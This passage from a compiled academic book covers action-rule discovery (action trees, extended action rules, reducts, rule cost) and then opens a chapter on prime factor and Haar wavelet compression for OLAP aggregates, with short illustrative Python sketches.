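Run on the rules of Table 1, this reproduces the extended rule [[a1 ∧ g2 ∧ (b, b1 → b2) ∧ (h, → h2)] ⇒ (d, d1 → d2)] discussed above.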
Main Thrust of the Chapter

1. Issues, Controversies, Problems

In this section, we present a modification of the action-tree algorithm (Tsay & Ras, 2005) for discovering action rules. Namely, we partition the set of classification rules R discovered from a decision system S = (U, ASt ∪ AFl ∪ {d}), where ASt is the set of stable attributes, AFl is the set of flexible attributes, and Vd = {d1, d2,..., dk} is the set of decision values, into subsets of rules having the same values of stable attributes in their classification parts and defining the same value of the decision attribute. Classification rules can be extracted from S using, for instance, the discovery system LERS (Grzymala-Busse, 1997). The action-tree algorithm for discovering extended action rules from a decision system S is as follows:
Build Action Tree:

Step 1.
• Partition the set of classification rules R in such a way that two rules are in the same class if their stable attributes are the same.
• Find the cardinality of the domain Vvi for each stable attribute vi in S.
• Take the vi for which card(Vvi) is the smallest as the splitting attribute, and divide R into subsets, each of which contains rules having the same value of the stable attribute vi.
• For each subset obtained in step 2, determine if it contains rules of different decision values and different values of flexible attributes. If it does, go to step 2. If it does not, there is no need to split the subset further, and we place a mark.

Step 2.
• Partition each resulting subset into new subsets, each of which contains only rules having the same decision value.

Step 3.
• Each leaf of the resulting tree represents a set of rules that do not contradict on stable attributes and that uniquely defines decision value di. The path from the root to that leaf gives the description of objects supported by these rules.
Generate Extended Action Rules:
• Form extended action rules by comparing all unmarked leaf nodes of the same parent.

Table 2.

     a   b   c   d
x1   2   1   2   L
x2   2   1   2   L
x3   1   1   0   H
x4   1   1   0   H
x5   2   3   2   H
x6   2   3   2   H
x7   2   1   1   L
x8   2   1   1   L
x9   2   2   1   L
x10  2   3   0   L
x11  1   1   2   H
x12  1   1   1   H

The algorithm starts at the root node of the tree, called the action tree, representing all classification rules extracted from S. A stable attribute is selected to partition these rules. For each value of that attribute, an outgoing edge from the root node is created, and the corresponding subset of rules that have the attribute value assigned to that edge is moved to the newly created child node. This process is repeated recursively for each child node. When we are done with stable attributes, the last split is based on the decision attribute for each current leaf of the action tree. If at any time all classification rules representing a node have the same decision value, then we stop constructing that part of the tree. We still have to explain which stable attributes are chosen to split classification rules representing a node of the action tree. The algorithm selects any stable attribute that has the smallest number of possible values among all the remaining stable attributes. This step is justified by the need to apply a heuristic strategy (Ras, 1999) that will minimize the number of edges in the resulting tree and, at the same time, make the complexity of the algorithm lower. We have two types of nodes: a leaf node and a nonleaf node. At a nonleaf node, the set of rules is partitioned along the branches, and each child node gets its corresponding subset of rules. Every path to the decision attribute node, one level above the leaf node, represents a subset of the extracted classification rules in which the stable attributes have the same value. Each leaf node represents a set of rules that do not contradict on stable attributes and that also define decision value di. The path from the
root to that leaf gives the description that objects supporting these rules have to satisfy. Instead of splitting the set of rules R by stable attributes and next by the decision attribute, we can also start the partitioning algorithm from the decision attribute. For instance, if the decision attribute has three values, we get three initial subtrees. In the next step of the algorithm, we start splitting these subtrees by stable attributes, following the same strategy as the one presented for action trees. This new algorithm is called the action-forest algorithm. Now, let us take Table 2 as an example of a decision system S. Attributes a and c are stable, and b and d are flexible. Assume now that our plan is to reclassify some objects from the class (d, L) into the class (d, H). Table 3 shows the set of classification rules extracted from Table 2 by the LERS algorithm (Grzymala-Busse, 1997).

Figure 1.

The first column presents sets of objects supporting these rules. First, we represent the set R of certain rules extracted from S as a table (see Table 3). The first column of this table shows objects in S supporting the rules from R (each row represents a
Table 3.
Objects            a   b   c   d
{x3,x4,x11,x12}    1           H
{x7,x8,x9}         2       1   L
{x1,x2,x7,x8}      2   1       L
{x3,x4}                1   0   H
{x5,x6}                3   2   H
rule). For instance, the second row represents the rule [[(a,2) ∧(c, 1)] → (d, L)]. The construction of an action tree starts with the set R as a table (see Table 3) representing the root of the tree T1 in Fig. 1. The root node selection is based on a stable attribute, with the smallest number of values among all stable attributes. The same strategy is used for a child node selection. After labeling the nodes of the tree by all stable attributes, the tree is split, based on the value of the decision attribute. Referring back to the example in Table 3, we use stable attribute a to split that table into two subtables defined by values {1, 2} of attribute a. The domain Va of attribute a is {1, 2}. Since card[Va] < card[Vc], then we partition the table into two: one table with rules containing the term (a,1) and another with rules containing the term (a,2). Corresponding edges are labeled by values of attribute a. All rules in the subtable T2 have the same decision value. So, action rules cannot be constructed from subtable T2, which means it is not divided any further. Because rules in the subtable T3 contain different decision values and a stable attribute c, T3 is partitioned into three subtables, one with rules containing the term (c, 0), one with rules containing (c, 1), and one with rules containing (c, 2). Now, rules in each of the subtables do not contain any stable attributes. Subtable T6 is not split any further for the same reason as subtable T2. All objects in subtable T4 have the same value of flexible attribute b. So, there is no way to construct a workable strategy from this subtable, which means it is not partitioned any further. Subtable T5 is divided into two new subtables. Each leaf represents a set of rules that do not contradict on stable attributes, and also define decision value di. The path from the root of the tree to that leaf gives the description of objects supported by these rules. Following the path described by the term (a, 2)∧(c, 2)∧(d , L), we get table T7. Following the path described by the term (a, 2)∧(c, 2)∧(d, H), we get table T8. Because T7 and T8 are sibling nodes, we can directly compare pairs of rules belonging
to these two tables and construct an action rule [[(a,2) ∧ (b, 1 → 3)] ⇒ (d, L → H)]. The action-tree algorithm proposed in this section requires the extraction of all classification rules from the decision system before any action rule is constructed. Additionally, the action rule extraction strategy presented here has O(k²) complexity in the worst case, where k is the number of classification rules. The question is whether any action rule can be constructed from a single classification rule by a strategy that guarantees the same time complexity for action rule construction as for classification rule discovery.
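The comparison of sibling leaves can be sketched in Python as follows. The rule encodings below are hypothetical stand-ins for the rules supported by {x1,x2,x7,x8} and {x5,x6} in the running example, and the pairing logic is a simplified reading of the procedure, not the DEAR system itself.

```python
def make_action_rule(rule_from, rule_to, stable_attrs):
    """rule_from / rule_to: (condition dict, decision value) taken from sibling leaves."""
    cond_f, d_from = rule_from
    cond_t, d_to = rule_to
    for a in stable_attrs:                      # stable values must not contradict
        if a in cond_f and a in cond_t and cond_f[a] != cond_t[a]:
            return None
    header = {a: cond_f.get(a, cond_t.get(a))
              for a in sorted(stable_attrs) if a in cond_f or a in cond_t}
    changes = {a: (cond_f.get(a), cond_t[a])    # None means "from any value"
               for a in cond_t
               if a not in stable_attrs and cond_f.get(a) != cond_t[a]}
    return header, changes, (d_from, d_to)

# Hypothetical stand-ins for the rules supported by {x1,x2,x7,x8} and {x5,x6}:
r_L = ({"a": 2, "b": 1}, "L")
r_H = ({"b": 3, "c": 2}, "H")
print(make_action_rule(r_L, r_H, stable_attrs={"a", "c"}))
# ({'a': 2, 'c': 2}, {'b': (1, 3)}, ('L', 'H'))  ~  [(a,2) ^ (c,2) ^ (b,1->3)] => (d,L->H)
```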
2. Solutions and Recommendations
Let us assume again that S = (U, ASt ∪AFl ∪{d}) is a decision system, where d ∉ ASt ∪AFl is a distinguished attribute called the decision. The elements of ASt are called stable conditions, whereas the elements of AFl ∪{d} are called flexible. Assume that d1 ∈ Vd and x ∈ U. We say that x is a d1-object if d(x)=d1. We also assume that {a1, a2,..., ap} ⊆ ASt, {b1, b2,..., bq} ⊆ AFl, a[i,j] denotes a value of attribute ai, b[i,j] denotes a value of attribute bi, for any i, j and that: r = [[a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]] ∧ [b[1,1] ∧ b[2,1] ∧ ..... ∧ b[q,1]] → d1] is a classification rule extracted from S supporting some d1-objects in S. By sup(r) and conf(r), we mean the support and the confidence of r, respectively. Class d1 is a preferable class, and our goal is to reclassify d2-objects into the d1 class, where d2 ∈ Vd. By an extended action rule r[d2 → d1] associated with r and the reclassification task (d, d2 → d1) we mean the following expression: r[d2 → d1] = [[a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]] ∧ [(b1, → b[1,1]) ∧ (b2, → b[2,1]) ∧ ..... ∧ (bq, → b[q,1])] ⇒ (d, d2 → d1)].
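A minimal sketch of how r[d2 → d1] can be assembled from a single classification rule is given below; the attribute names and the plain-text rendering of the rule are illustrative assumptions of this sketch.

```python
# Illustrative sketch: writing out r[d2 -> d1] for one classification rule r.
# The dict keys a1/b1 and the text rendering are assumptions, not the chapter's notation.

def extended_action_rule(stable_part, flexible_part, d_from, d_to):
    header = [f"({a},{v})" for a, v in stable_part.items()]          # fixed header
    changes = [f"({b}, -> {w})" for b, w in flexible_part.items()]   # flexible change terms
    lhs = " ^ ".join(header + changes)
    rhs = f"(d, {d_from} -> {d_to})" if d_from is not None else f"(d, -> {d_to})"
    return f"[{lhs}] => {rhs}"

# r = [(a1, 2) ^ (b1, 1)] -> d1, reused for the reclassification task d2 -> d1:
print(extended_action_rule({"a1": 2}, {"b1": 1}, "d2", "d1"))
# [(a1,2) ^ (b1, -> 1)] => (d, d2 -> d1)
```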
In a similar way, by an extended action rule r[ → d1] associated with r and the reclassification task (d, → d1) we mean the following expression: r[ → d1] = [[a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]] ∧ [(b1, → b[1,1]) ∧ (b2, → b[2,1]) ∧ ..... ∧ (bq, → b[q,1])] ⇒ (d, → d1)]. The term [a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]], built from values of stable attributes, is called the header of the action rule r[d2 → d1], and its values cannot be changed. The support set of the action rule r[d2 → d1] is defined as: Sup(r[d2 → d1]) = {x ∈ U: ( a1(x)=a[1,1] ∧ a2(x)=a[2,1] ∧ ... ∧ ap(x)=a[p,1] ) ∧ (d(x)=d2) }. Clearly, if conf(r) ≠ 1, then some objects in S satisfying the description [a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1] ∧ b[1,1] ∧ b[2,1] ∧ ..... ∧ b[q,1]] are classified as d2. According to the rule r[d2 → d1] they should be classified as d1, which means that the confidence of r[d2 → d1] will get decreased. If Sup(r[d2 → d1]) = ∅, then r[d2 → d1] cannot be used for reclassification of objects. Similarly, r[ → d1] cannot be used for reclassification if Sup(r[d2 → d1]) = ∅ for each d2 where d2 ≠ d1. From the point of view of actionability, such rules are not interesting (Silberschatz & Tuzhilin, 1995, 1996). In the following paragraphs, we show how to calculate the confidence of action rules and extended action rules. Let r[d2 → d1], r'[d2 → d3] be two action rules extracted from S. We say that these rules are p-equivalent (≈) if the following condition holds for every bi ∈ AFl ∪ ASt: if r/bi, r'/bi are both defined, then r/bi = r'/bi. Now, we explain how to calculate the confidence of r[d2 → d1]. Let us take a d2-object x ∈ Sup(r[d2 → d1]). We say that x positively supports r[d2 → d1] if there is no
classification rule r' extracted from S and describing d3 ∈ Vd, d3 ≠ d1, which is p-equivalent to r, such that x ∈ Sup(r'[d2 → d3]). The corresponding subset of Sup(r[d2 → d1]) is denoted by Sup+(r[d2 → d1]). Otherwise, we say that x negatively supports r[d2 → d1]. The corresponding subset of Sup(r[d2 → d1]) is denoted by Sup-(r[d2 → d1]). By the confidence of r[d2 → d1] in S we mean: Conf(r[d2 → d1]) = [card[Sup+(r[d2 → d1])] / card[Sup(r[d2 → d1])]] ⋅ conf(r). Now, let us go back to the definition of an extended action rule r[d2 → d1] associated with r: r[d2 → d1] = [[a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]] ∧ [(b1, → b[1,1]) ∧ (b2, → b[2,1]) ∧ ..... ∧ (bq, → b[q,1])] ⇒ (d, d2 → d1)]. In the previous section, we introduced the relation ≈bi defined on the set U as: x ≈bi y iff bi(x)=bi(y), for any x, y ∈ U. Now, assume that B = {b1,b2,…,bq} and ≈B = ∩{ ≈bi : bi ∈ B}. We say that B is bi-reducible with respect to an extended action rule r in S if U/≈B = U/≈B-{bi}, where bi ∈ B. We say that C ⊆ B is a reduct with respect to an extended action rule r if U/≈B = U/≈C and, for any bi ∈ C, the set C is not bi-reducible with respect to an extended action rule r in S.
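The reduct computation sketched here follows the partition-based definition above in a greedy, simplified form; the helper names and the toy example table are assumptions of this sketch.

```python
def partition(U, attrs, value):
    """U/≈ for the given attribute set; value(x, a) returns a's value on x."""
    blocks = {}
    for x in U:
        blocks.setdefault(tuple(value(x, a) for a in attrs), set()).add(x)
    return {frozenset(b) for b in blocks.values()}

def reduct(U, B, value):
    """Greedily drop every bi whose removal leaves U/≈ unchanged (bi-reducible)."""
    C = list(B)
    target = partition(U, C, value)
    for b in list(C):
        rest = [a for a in C if a != b]
        if rest and partition(U, rest, value) == target:
            C = rest
    return C

# Toy check: b2 is constant over U, so it drops out of the reduct.
table = {"x1": {"b1": 1, "b2": 0}, "x2": {"b1": 2, "b2": 0}}
print(reduct(table.keys(), ["b1", "b2"], lambda x, a: table[x][a]))   # ['b1']
```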
Theorem. Each reduct with respect to an extended action rule r in S defines uniquely a new extended action rule in S.
Proof (sketch). Assume that:
r[d2 → d1] = [[a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]] ∧ [(b1, → b[1,1]) ∧ (b2, → b[2,1]) ∧ ..... ∧ (bq, → b[q,1])] ⇒ (d, d2 → d1)]
is an extended action rule in S and, for instance, [B-{b1,b2}] is a reduct with respect to r[d2 → d1]. It basically means that all objects in U have the same value in the case of attributes b1, b2. Let us assume that b[1,i], b[2,j] are these two values. Because [B-{b1,b2}] is a reduct, then:
{x: [a1(x)=a[1,1] ∧ a2(x)=a[2,1] ∧ ... ∧ ap(x)=a[p,1]] ∧ d(x)=d2 ∧ [b1(x)=b[1,i] ∧ b2(x)=b[2,j]]}
is not an empty set. The rule:
[[a[1,1] ∧ a[2,1] ∧ ... ∧ a[p,1]] ∧ [(b3, → b[3,1]) ∧ ..... ∧ (bq, → b[q,1])] ⇒ (d, d2 → d1)]
is then the new extended action rule in S defined by this reduct.
Assume that d is a decision attribute in S, d1, d2 ∈ Vd, and the user would like to reclassify objects in S from the group d1 to the group d2. Assuming that the cost of reclassification with respect to each attribute is given, he/she may look for an appropriate action rule, possibly of the lowest cost value, to get a hint about which attribute values need to be changed (Tzacheva & Ras, 2005). To be more precise, let us assume that RS[(d, d1 → d2)] denotes the set of all action rules in S having the term (d, d1 → d2) on their decision side. Additionally, we assume that the cost representing the left-hand side of a rule in RS[(d, d1 → d2)] is always lower than the cost associated with its right-hand side. Now, among all action rules in RS[(d, d1 → d2)], we may identify a rule that has the lowest cost value. But the rule we get may still have a cost value that is much too high to be of any help. Let us notice that the cost of the action rule
r = [(b1, v1 → w1) ∧ (b2, v2 → w2) ∧ ... ∧ (bp, vp → wp)] ⇒ (d, d1 → d2)
might be high only because of the high cost value of one of the subterms in its conditional part. Let us assume that (bj, vj → wj) is that term. In such a case, we may look for an action rule in RS[(bj, vj → wj)] that has the smallest cost value and replace the term (bj, vj → wj) in r by the conditional part of that rule. Clearly, the cost of this new rule is lower than the cost of r. However, if its support in S gets too low, then such a rule has no value to us. Otherwise, we may recursively follow this strategy, trying to lower the cost needed to reclassify objects from the group d1 into the group d2. Each successful step will produce a new action rule whose cost is lower than the cost of the current rule. Obviously, this heuristic strategy always ends. Interestingness of rules is closely linked with their cost. It means that new algorithms showing how to look for rules of the lowest cost are needed. An example of such an algorithm can be found in Tzacheva and Ras (2005).
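A simplified sketch of this cost-guided search is shown below, assuming per-term reclassification costs are supplied as a dictionary; it performs only a single refinement step and is not the algorithm of Tzacheva and Ras (2005).

```python
# Simplified sketch of the cost-based search described above. An action rule is
# a list of atomic terms (attribute, v, w); per-term costs are assumed given.

def rule_cost(rule, cost):
    return sum(cost[term] for term in rule)

def cheapest(rules, cost):
    return min(rules, key=lambda r: rule_cost(r, cost)) if rules else None

def lower_cost(rule, RS, cost):
    """Try to replace the most expensive term of `rule` by a cheaper action
    rule from RS[term] that achieves the same change (one refinement step)."""
    worst = max(rule, key=lambda t: cost[t])
    replacement = cheapest(RS.get(worst, []), cost)
    if replacement and rule_cost(replacement, cost) < cost[worst]:
        return [t for t in rule if t != worst] + replacement
    return rule
```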
CONCLUSION
Attributes are divided into two groups: stable and flexible. By stable attributes we mean attributes whose values cannot be changed (for instance, age or maiden name). On the other hand, attributes (like percentage rate or loan approval to buy a house) whose values can be changed are called
flexible. Classification rules are extracted from a decision table, using standard KD methods, with preference given to flexible attributes, so mainly these are listed in the classification part of the rules. Most of these rules can be seen as actionable rules and, at the same time, used to construct action rules. Two methods for discovering extended action rules are presented. The first one, based on action trees, requires comparing pairs of classification rules and, depending on the result of this comparison, an action rule is either built or not. The second strategy shows how to construct extended action rules from a single classification rule. In its first step, the most general extended action rule is built, and next, it is partitioned into a number of atomic expressions representing a new class of extended action rules that jointly represent the initial extended action rule. The first strategy can be seen as a bottom-up method, whereas the second strategy is a classical example of a top-down method.
REFERENCES
Adomavicius, G., & Tuzhilin, A. (1997). Discovery of actionable patterns in databases: The action hierarchy approach. In Proceedings of KDD97 Conference. Newport Beach, CA: AAAI Press.
Geffner, H., & Wainer, J. (1998). Modeling action, knowledge and control. In H. Prade (Ed.), ECAI 98, 13th European Conference on AI (pp. 532-536). John Wiley & Sons.
Greco, S., Matarazzo, B., Pappalardo, N., & Slowinski, R. (2005). Measuring expected effects of interventions based on decision rules. Journal of Experimental and Theoretical Artificial Intelligence, 17(1-2).
Grzymala-Busse, J. (1997). A new version of the rule induction system LERS. Fundamenta Informaticae, 31(1), 27-39.
Liu, B., Hsu, W., & Chen, S. (1997). Using general impressions to analyze discovered classification rules. In Proceedings of KDD97 Conference. Newport Beach, CA: AAAI Press.
Pawlak, Z. (1991). Information systems—theoretical foundations. Information Systems Journal, 6, 205-218.
Ras, Z. (1999). Discovering rules in information trees. In J. Zytkow & J. Rauch (Eds.), Principles of Data Mining and Knowledge Discovery, Proceedings of PKDD'99, Prague, Czech Republic, LNAI, No. 1704 (pp. 518-523). Springer.
Ras, Z.W., & Dardzinska, A. (2006). Action rules discovery, a new simplified strategy. In F. Esposito et al. (Eds.), Foundations of Intelligent Systems, Proceedings of ISMIS'06, Bari, Italy, LNAI, No. 4203 (pp. 445-453). Springer.
Ras, Z., & Tsay, L.-S. (2003). Discovering extended action-rules, System DEAR. In Intelligent Information Systems 2003, Advances in Soft Computing, Proceedings of IIS2003 Symposium, Zakopane, Poland (pp. 293-300).
Ras, Z.W., Tzacheva, A., & Tsay, L.-S. (2005). Action rules. In J. Wang (Ed.), Encyclopedia of data warehousing and mining (pp. 1-5). Idea Group Inc.
Ras, Z., & Wieczorkowska, A. (2000). Action rules: How to increase profit of a company. In D.A. Zighed, J. Komorowski, & J. Zytkow (Eds.), Principles of Data Mining and Knowledge Discovery, Proceedings of PKDD'00, Lyon, France, LNAI, No. 1910 (pp. 587-592). Springer.
Silberschatz, A., & Tuzhilin, A. (1995). On subjective measures of interestingness in knowledge discovery. In Proceedings of KDD'95 Conference. AAAI Press.
Silberschatz, A., & Tuzhilin, A. (1996). What makes patterns interesting in knowledge discovery systems. IEEE Transactions on Knowledge and Data Engineering, 5(6).
Tsay, L.-S., & Ras, Z.W. (2005). Action rules discovery system DEAR, method and experiments. Journal of Experimental and Theoretical Artificial Intelligence, 17(1-2), 119-128.
Tsay, L.-S., & Ras, Z.W. (2006). Action rules discovery system DEAR3. In F. Esposito et al. (Eds.), Foundations of Intelligent Systems, Proceedings of ISMIS'06, Bari, Italy, LNAI, No. 4203 (pp. 483-492). Springer.
Tzacheva, A., & Ras, Z.W. (2005). Action rules mining. International Journal of Intelligent Systems, 20(7), 719-736.
This work was previously published in Rough Computing: Theories, Technologies and Applications, edited by A. Hassanien, Z. Suraj, D. Slezak, and P. Lingras, pp. 175-184, copyright 2008 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Chapter 7.24
Optimization of Multidimensional Aggregates in Data Warehouses Russel Pears Auckland University of Technology, New Zealand Bryan Houliston Auckland University of Technology, New Zealand
ABSTRACT The computation of multidimensional aggregates is a common operation in OLAP applications. The major bottleneck is the large volume of data that needs to be processed which leads to prohibitively expensive query execution times. On the other hand, data analysts are primarily concerned with discerning trends in the data and thus a system that provides approximate answers in a timely fashion would suit their requirements better. In this article we present the prime factor scheme, a novel method for compressing data in a warehouse. Our data compression method is based on aggregating data on each dimension of the data warehouse. We used both real world and synthetic data to compare our scheme against the Haar wavelet and our experiments on range-sum queries show that it outperforms the
latter scheme with respect to both decoding time and error rate, while maintaining comparable compression ratios. One encouraging feature is the stability of the error rate when compared to the Haar wavelet. Although wavelets have been shown to be effective at compressing data, the approximate answers they provide varies widely, even for identical types of queries on nearly identical values in distinct parts of the data. This problem has been attributed to the thresholding technique used to reduce the size of the encoded data and is an integral part of the wavelet compression scheme. In contrast the prime factor scheme does not rely on thresholding but keeps a smaller version of every data element from the original data and is thus able to achieve a much higher degree of error stability which is important from a Data Analysts point of view.
INTRODUCTION Data warehouses are increasingly being used by decision makers to analyze trends in data (Cunningham, Song & Chen, 2006, Elmasri & Navathe, 2003). Thus a marketing analyst is able to track variation in sales income across dimensions such as time period, location, and product on their own or in combination with each other. This analysis requires the processing of multi-dimensional aggregates and groups by operations against the underlying data warehouse. Due to the large volumes of data that needs to be scanned from secondary storage, such queries, referred to as On Line Analytical Processing (OLAP) queries, can take from minutes to hours in large scale data warehouses (Elmasri, 2003, Oracle 9i). The standard technique for improving query performance is to build aggregate tables that are targeted at known queries (Elmasri, 2003; Triantafillakis, Kanellis, & Martakos 2004). For example the identification of the top 10 selling products can be speeded up by building a summary table that contains the total sales value (in dollar terms) for each of the products sorted in decreasing order of sales value. It would then be a simple matter of querying the summary table and retrieving the first 10 rows. The main problem with this approach is the lack of flexibility. If the analyst now chooses to identify the bottom 10 products an expensive re-sort would have to be performed to answer this new query. Worst still, if the information is to be tracked by sales location then the summary table would be of no value at all. This problem is symptomatic of a more general one, where database systems which have been tuned for a particular access pattern perform poorly as changes to such patterns occur over a period of time. In their study (Zhen & Darmont, 2005) showed that database systems which have been optimized through clustering to suit particular query patterns rapidly degrade in performance when such query patterns change in nature.
The limitations in the above approach can be addressed by a data compression scheme that preserves the original structure of the data. For example, a 3-dimensional warehouse that tracks sales by time period, location and products can be compressed along all three dimensions and then stored in the form of “chunks” (Sarawagi & Stonebraker, 1994). Chunking is a technique that is used to partition a d-dimensional array into smaller d-dimensional units. In principle, any data compression scheme can be applied on a data warehouse, but we were mindful of the fact that a high compression ratio would be needed to offset the potentially huge secondary storage access times. This effectively ruled out standard compression techniques such as Huffman coding (Cormack, 1985), LZW and its variants (Lempel & Ziv, 1977; Hunt 1998) Arithmetic Coding (Langdon, 1984). These schemes enable decoding to the original data with 100% accuracy, but suffer from modest compression ratios (Ng & Ravishankar, 1997). On the other hand, the trends analysis nature of decision making means that query results do not need to reflect 100% accuracy. For example, during a drill-down query sequence in ad-hoc data mining, initial queries in the sequence usually determine the truly interesting queries and regions of the database. Providing approximate, yet reasonably accurate answers to these initial queries gives users the ability to focus their explorations quickly and effectively, without consuming inordinate amounts of valuable system resources (Hellerstein, Haas, & Wang, 1997). This means that lossy schemes which exhibit relatively high compression and near 100% accuracy would be the ideal solution to achieving acceptable performance for OLAP queries. This article investigates the performance of a novel scheme, called prime factor compression (PFC) and compares it against the well known wavelet approach (Chakrabarti & Garofalakis, 2000; Vitter & Wang, 1998; Vitter & Wang 1999).
The rest of the article is organized as follows. In the next section we review related work and establish a framework on which PFC is built. We then present the algorithms required for encoding and decoding with the PFC approach. The online reconstruction of Queries is discussed thereafter. Implementation related issues are presented, followed by a performance evaluation of PFC and comparison with the Haar wavelet algorithm. We conclude the article with a summary and discuss some ideas for future work.
RELATED WORK Previous research tends to concentrate on computing exact answers to OLAP queries (Ho, & Agrawal, 1997, Wang, Feng, Lu, & Yu, 2002). Ho describes a method that pre-processes a data cube to give a prefix sum cube. The prefix sum cube is computed by applying the transformation: P[Ai]=C[Ai]+P[Ai-1] along each dimension of the data cube, where P denotes the prefix sum cube, C the original data cube, Ai denotes an element in the cube, and i is an index in a range 1..Di (Di is the size of the dimension Di). This means that the prefix cube requires the same storage space as the original data cube. The above approach is efficient for low dimensional data cubes. For high dimensional environments, two major problems exist. First, the number of accesses required is 2d (Ho & Agrawal, 1997), which can be prohibitive for large values of d (where d denotes the number of dimensions). Second, the storage required to store the prefix sum cube can be excessive. In a typical OLAP environment the data tends to be massive and yet sparse at the same time. The degree of sparsity increases with the number of dimensions (OLAP) and thus the number of non-zero cells may be a very small fraction of the prefix sum cube, which by its nature has to be dense for its query processing algorithms to work correctly.
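For illustration, a minimal NumPy sketch of the prefix-sum transformation P[Ai] = C[Ai] + P[Ai-1] and a 2-dimensional range-sum lookup is given below; the toy cube is, of course, hypothetical.

```python
import numpy as np

# Sketch of the prefix-sum cube: apply a cumulative sum along each dimension in
# turn; a range sum can then be answered from 2^d cells of P (inclusion-exclusion).

def prefix_sum_cube(C):
    P = C.astype(np.int64)
    for axis in range(P.ndim):
        np.cumsum(P, axis=axis, out=P)
    return P

C = np.arange(16).reshape(4, 4)
P = prefix_sum_cube(C)
# Sum over C[1:3, 1:3] from just four cells of P:
s = int(P[2, 2] - P[0, 2] - P[2, 0] + P[0, 0])
assert s == C[1:3, 1:3].sum() == 30
```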
Another exact technique is the Dwarf cube method (Sismannis & Deligiannakis, 2002) which seeks to eliminate structural redundancies and factor them out by coalescing their store. Pre-fix redundancy arises when the fact table contains a group of tuples having a prefix of redundant values for its dimension attributes. On the other hand, suffix redundancy occurs when groups of tuples contain a suffix of redundant values for its dimension attributes. Elimination of these redundancies has been shown to be effective for dense cubes. Unfortunately, in the case of sparse cubes with a large number of dimensions the size of the fact table can actually increase in size (Sismannis & Deligiannakis, 2002), thus providing no gains in storage efficiency. In contrast to exact methods, approximate methods attempt to strike a good balance between the degree of compression and accuracy. Query performance is enhanced by storing a compact version of the data cube. A histogram-based approach was used by (Matias & Vitter, 1998; Poosala & Gnati, 1999; Vitter & Wang, 1998), to summarize the data cube. However, histograms also suffer from the curse of high dimensionality, with both space and time complexity increasing exponentially with the number of dimensions (Matias & Vitter, 1998). The progressive approximate aggregate approach (Lazaridis & Mehrotra, 2001) uses a tree structure to speed up the computation of aggregates. Aggregates are computed by identifying tree nodes that intersect the query region and then accumulating their values incrementally. All tree nodes that are fully contained in the query region provide an exact contribution to the query result, whereas nodes that have a partial intersection provide an estimate. This estimation is based on an assumption of spatial uniformity of attribute values across the underlying data cube. In practice this assumption may be invalid as with the case of the real world data (U.S. Census) that we experimented with in our study. In contrast, our
method makes no such assumptions on the shape of the source data distribution. Another issue with the previously mentioned scheme is that it has a worst case run time performance that is linear in the number of data elements covered by the query, as observed by (Chen et al., 2003). This has negative implications for queries that span a large fraction of the underlying data cube, particularly since compression is not utilized to store source data. Sampling is another approach that has been used to speed up aggregate processing. Essentially, a small random sample of the database is selected and the aggregate is computed on this sample. The sampling operation can be done off-line, whereby the sample is extracted from the database and all queries are run on this single extracted sample. On the other hand, online sampling data is read randomly from the database each time a query is executed and the aggregate computed on the dynamically generated sample (Hellerstein, Haas, & Wang, 1996). The very nature of sampling makes it very efficient in terms of run time, but its accuracy has been shown to be a limiting factor in its widespread adoption (Vitter & Wang, 1999). Vitter and Wang (1999), use the wavelet technique to transform the data cube into a compact form. It is essentially a data compression technique that transforms the original data cube into a wavelet transform array (WTA), which is a fraction of the size of the original data cube. In their research, Matias and Vitter (1998) show that wavelets are superior to the histogram based methods, both in terms of accuracy and storage efficiency. Wavelets have also been shown to provide good compression with sparse data cubes, unlike the Dwarf compression method. Given the wavelet’s superior performance over its rivals and the fact that it is an approximate technique, it was an ideal choice for comparison against our prime factor scheme, which is also approximate in nature. The next section provides a brief overview of the encoding and decoding procedures used in wavelet data compression.
Wavelet Data Compression Scheme
The wavelet scheme compresses by transforming the source data into a representation (the wavelet transform array, or WTA) that contains a large number of zero or near-zero values. The transformation uses a series of averaging operations that operate on each pair of neighboring source data elements. In this manner the original data is transformed into a data set (the Level 1 transform set) that contains the averages of pairs of elements from the original data set. The pair-wise averaging process is then applied recursively on the Level 1 transform set. The process continues in this manner until the size of the transformed set is equal to 1. In order to be able to reconstruct the original data, the pair-wise differences between neighbors are kept in addition to the averages. The WTA array then consists of all pair-wise averages and differences accumulated across all levels. A thresholding function is then applied on the WTA to remove a large fraction of array elements which are small in value. The thresholding function applies a weighting scheme on the WTA elements, as those elements at the higher levels play a more significant role in reconstruction than their counterparts at the lower levels. For details of the wavelet encoding and decoding techniques the reader is referred to (Vitter & Wang, 1999).
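A minimal sketch of the pair-wise averaging transform and a simple "keep the k largest coefficients" cut is shown below. Note that the actual thresholding in the wavelet literature weights coefficients by level, which this sketch omits; the sample data and function names are illustrative.

```python
# Sketch of the pair-wise averaging transform (non-normalized Haar wavelet),
# followed by a naive "keep the k largest coefficients" truncation.

def haar_encode(data):
    data = list(data)                 # length assumed to be a power of two
    detail = []
    while len(data) > 1:
        avgs = [(a + b) / 2 for a, b in zip(data[0::2], data[1::2])]
        difs = [(a - b) / 2 for a, b in zip(data[0::2], data[1::2])]
        detail = difs + detail        # coarser levels end up at the front
        data = avgs
    return data + detail              # [overall average, details...]

def threshold(wta, k):
    keep = sorted(range(len(wta)), key=lambda i: abs(wta[i]), reverse=True)[:k]
    return [v if i in keep else 0 for i, v in enumerate(wta)]

wta = haar_encode([2, 2, 0, 2, 3, 5, 4, 4])
print(wta)            # [2.75, -1.25, 0.5, 0.0, 0.0, -1.0, -1.0, 0.0]
print(threshold(wta, 4))
```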
Wavelet Decoding
The decoding process reconstructs the original data by using the truncated version of the WTA. The decoding process is best illustrated with the following example. Figure 1 shows how the coefficients of the original array are reconstructed from the WTA (the C coefficients hold the original array while the S coefficients hold the WTA). Any coefficient C(i) is reconstructed by using its ancestor S coefficients on the path from the root node to itself. Thus, for example, C(0) = S(0) + S(1) + S(2) + S(4) and C(1) = S(0) + S(1) + S(2) − S(4).
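The reconstruction can be sketched as follows, using the coefficient layout produced by the encoding sketch above; the second call shows how zeroing out lower-level coefficients (such as S(4)) propagates error into the decoded values.

```python
# Sketch of decoding: each C(i) is rebuilt from its ancestor S coefficients,
# here done level by level for the whole (possibly thresholded) WTA.

def haar_decode(wta):
    data = [wta[0]]
    pos = 1
    while pos < len(wta):
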